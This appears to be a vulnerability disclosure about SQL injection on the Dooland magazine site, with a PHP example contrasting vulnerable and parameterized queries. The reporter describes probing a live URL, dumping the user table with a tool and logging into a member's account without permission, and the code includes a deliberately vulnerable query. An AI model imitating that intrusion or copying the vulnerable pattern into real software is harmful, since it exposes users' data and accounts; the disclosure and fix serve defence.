2013-12-13: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2014-01-27: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
Dooland (读览天下) has a SQL injection vulnerability that leaks a large amount of user information. The leaked information can be used to get into the member interface and buy magazines with RMB. Personally I feel this site has no privacy left, hehe.
I came across the site by chance:
http://www.dooland.com/iptv/article.php?id=174129
Then I added a single quote to the id parameter and the page threw an error:
Error in selecting database error:1064 error message You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''174129''' at line 1 sql: select * from wap.articles where id='174129''
An obvious MySQL error, so I used a tool to inject.
Found the user table, then looked at the user data.
Then I logged in with one of the users who was a member and found something nice: the account balance...
The other tables also contain a lot of important content, but I had no mind to keep injecting; I just hope the vendor gives a few more rank points.
The vendor's developers can figure out the fix themselves; there are plenty of techniques online for preventing injection in PHP.
Could not reach the vendor, or the vendor actively refused.
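For the developers' benefit, an added example (not the site's code, written for this page) of the pattern behind the error above and the fix: the table and column names come from the error message on this page, while the PDO connection, the function names and the assumption that id is numeric are mine.

```php
<?php
// Added example, not code from dooland.com. Assumes a PDO connection $db created
// with PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION; table/column names (wap.articles, id)
// are taken from the error message in the report, everything else is assumed.

// VULNERABLE pattern: the raw query-string value is glued into the SQL text, so a
// single quote in ?id= breaks the statement and the driver's error text leaks to the browser.
function fetchArticleVulnerable(PDO $db, string $id): ?array
{
    $sql  = "select * from wap.articles where id='" . $id . "'";   // ?id=174129' -> syntax error
    $row  = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED version of the same lookup: validate the type, bind the value as a
// parameter, and keep driver error messages on the server side.
function fetchArticle(PDO $db, string $rawId): ?array
{
    // id is an integer in the application, so reject anything else before touching the DB
    if (!preg_match('/^\d{1,10}$/', $rawId)) {
        http_response_code(400);
        return null;
    }
    try {
        $stmt = $db->prepare('SELECT * FROM wap.articles WHERE id = :id');
        $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);   // value, never SQL text
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // log the real error server-side; the client only gets a generic status
        error_log('article lookup failed: ' . $e->getMessage());
        http_response_code(500);
        return null;
    }
}

// Usage (assumed connection details):
// $pdo = new PDO('mysql:host=localhost;dbname=wap', $user, $pass,
//                [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// $article = fetchArticle($pdo, $_GET['id'] ?? '');
```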